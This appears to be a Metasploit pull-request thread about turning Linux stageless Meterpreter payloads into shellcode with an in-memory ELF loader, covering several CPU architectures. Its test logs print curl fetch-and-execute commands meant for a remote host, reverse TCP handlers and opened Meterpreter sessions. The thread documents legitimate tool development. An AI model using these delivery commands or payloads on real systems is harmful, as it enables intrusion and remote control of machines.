Fix Linux Stageless Payload to be Shellcodes

[dledda-r7]

This PR Fixes the issue of linux stageless meterpreter.
Issue: #19670

Issue Description

The stageless linux meterpreters are ELF files that cannot be used as standard stageless shellcode payload.

Staged vs Stageless Linux Meterpreter

Staged

The Linux staged meterpreter is divided in 3 component

• A stager (connect back to msf to download the next stage)
• an intermediate stager that download the ELF on a RWX mmap, setup the stack and and jump on the e_entry of the ELF
• the Process Hollowing Friendly version of mettle's ELF

This version of the ELF is generated when we build mettle using the following tool: elf2bin

Stageless

The stageless mettle payload is the ELF file (standard elf) with the patched args.

Code Handling Staged vs Stageless

Mettle main.c

	/*
	 * Check to see if we were injected by metasploit | staged
	 */
	if (strcmp(argv[0], "m") == 0) {
		flags |= PAYLOAD_INJECTED;

		/*
		 * There is a fd sitting here, trust me
		 */
		int fd = (int)((long *)argv)[1];
		char *uri;
		if (asprintf(&uri, "fd://%d", fd) > 0) {
			struct c2 *c2 = mettle_get_c2(m);
			c2_add_transport_uri(c2, uri);
			free(uri);
		}
		parse_default_args(m, flags);
	} else {

#ifndef HAVE_SETPROCTITLE
		/* Prepare for later setproctitle emulation */
		saved_argv = calloc(argc + 1, sizeof(*saved_argv));
		for (int i = 0; i < argc; i++) {
			saved_argv[i] = strdup(argv[i]);
		}
		compat_init_setproctitle(argc, argv);
		argv = saved_argv;
#endif

		parse_default_args(m, flags);    // <- MSFVENOM REPLACE THE DEFAULT OPTION PARSED HERE
		if (parse_cmdline(argc, argv, m, flags)) {
			return -1;
		}
	}

Solution

For each architecture, a shellcode implementing this technique was made.
NOTE: This technique works only with Kernel >= 3.17

Instead of delivering the ELF only, the raw shellcode will be composed by the in-memory-loader arch specific shellcode and the elf file at the end of it.

Super thanks to @msutovsky-r7

What architectures fix this pr:

• linux/x86
• linux/x64
• linux/armle
• linux/aarch64
• linux/mips
• linux/mipsel
• linux/mips64

What is inside the PR and How to test it

• The <arch>/in_memory_loader.rb include the architecture specific shellcode to be prepended to the ELF binary.
• The addition to an empty <arch>/prepends.rb mixin for the missing architectures.
• Templates ELF binary and sources for missing architectures.
• The creation of a Mettle-specific datastore option for the selection of the binary compatibility to 2.6 or to 3.17 kernels.
• warning display if a prepends is applied when the kernel ds option is 2.6.
• Modification of the meterpreter_reverse.erb template for payload generation.

What to test

• Ensure the ELF delivered when MeterpreterLinuxMinKernel is 2.6+ is the same as before
• Ensure the ELF delivered when MeterpreterLinuxMinKernel is 3.17 is using the correct ELF template and is executed on a compatible target.
• Ensure the prepends are applied on the payload when MeterpreterLinuxMinKernel is 3.17 otherwise a warning is showed.

[bwatters-r7]

This makes a lot of sense- my only complaint is that we need to comment the asm a lot more, especially when you're doing shenanigans. 😆

[bwatters-r7]

Also, what are you using to test this? Do you have a elf that supports injection, or are you only testing by creating an elf stager from the shellcode?

[msutovsky-r7]

Also, what are you using to test this? Do you have a elf that supports injection, or are you only testing by creating an elf stager from the shellcode?

I generated ELF file using msfvenom and for actual testing, I used mostly qemu-static-[arch]. For some architectures, that was bit problem, like s390, so in that case, I had Linux OS running through qemu. So generally, for testing, I used qemu.

[bwatters-r7]

Minor cheat sheet additions

[bwatters-r7]

x64

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use payload/cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Command served: curl -so ./YcZpMZsOWVJ http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w;chmod +x ./YcZpMZsOWVJ;./YcZpMZsOWVJ&
[*] Command to run on remote host: curl -s http://10.5.135.201:8080/aoG3_q_U5dSCB61zrJpJEQ|sh
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Adding resource /aoG3_q_U5dSCB61zrJpJEQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.134.164 requested /aoG3_q_U5dSCB61zrJpJEQ
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Client 10.5.134.164 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.164:41258) at 2025-06-10 14:44:18 -0500

msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.134.164
OS           : Ubuntu 22.04 (Linux 6.8.0-1028-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[bwatters-r7]

AARCH64

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set prependsetuid true
prependsetuid => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set verbose true
verbose => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SDeLtHAov http://10.5.135.201:8080/TQMDQzG-j3qlgupsFHwcUQ;chmod +x ./SDeLtHAov;./SDeLtHAov&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /TQMDQzG-j3qlgupsFHwcUQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.132.214 requested /TQMDQzG-j3qlgupsFHwcUQ
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Meterpreter session 2 opened (10.5.135.201:4585 -> 10.5.132.214:48214) at 2025-06-10 14:47:11 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.214
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali

[bwatters-r7]

ARMLE

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set meterpreterlinuxminkernel 3.17+ 
meterpreterlinuxminkernel => 3.17+
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./WZmRLbLOTRP http://10.5.135.201:8080/OcFXJxS3XJGwQI9E1fvCLA;chmod +x ./WZmRLbLOTRP;./WZmRLbLOTRP&
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /OcFXJxS3XJGwQI9E1fvCLA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.212 requested /OcFXJxS3XJGwQI9E1fvCLA
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.212:42594) at 2025-06-11 14:01:42 -0500

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.212
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid

[bwatters-r7]

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT
The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

[msutovsky-r7]

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

It's causing segfault on this instruction:

0x77fb5dd0    lb     $v0, ($a0)     <Cannot dereference [0]>

So the issue is with Meterpreter itself - on qemu, it seems to be working though.

UPDATE:
It seems like the issue is with execveat instruction, which works, but somehow, it's not. Everything works as expected until that syscall - running file descriptor from different shell will run meterpreter. But somehow, spawning process with execveat breaks something and the meterpreter doesn't work.

[dledda-r7]

Suggested change

	<% if platform.downcase == 'linux' && !['armbe', 'ppc64le', 'ppc', 'ppce500v2'].include?(arch.downcase) %>include Msf::Payload::Linux::<%= arch.capitalize %>::ElfLoader<% end %>
	<% if platform.downcase == 'linux' %>include Msf::Payload::Linux::<%= arch.capitalize %>::Prepends<% end %>
	<% if platform.downcase == 'linux' && !['armbe', 'ppc64le', 'ppc', 'ppce500v2', 's390x'].include?(arch.downcase) %>include Msf::Payload::Linux::<%= arch.capitalize %>::ElfLoader<% end %>
	<% if platform.downcase == 'linux' %>include Msf::Payload::Linux::<%= arch.capitalize %>::Prepends<% end %>

[bwatters-r7]

Minor, but since zarch is not going to get the in-memory execution, should we remove this include? The prepends file is empty, so it does not effectively do anything now, but even if it were populated, it would not work, right? (same thing for the other zarch single paloads)

[smcintyre-r7]

Everything that should be working at this point has been tested. Everything that wasn't working has been removed. The tests that are failing are unrelated. At this point I think this is ready for landing.

[smcintyre-r7]

Release Notes

This updates stageless payloads for multiple architecture on Linux to be executable shellcode. The updates involve using an in-memory loader that requires Linux kernel version 3.17 or later in order to function. This means fixes stageless payloads for Linux to work in contexts where shellcode is expected.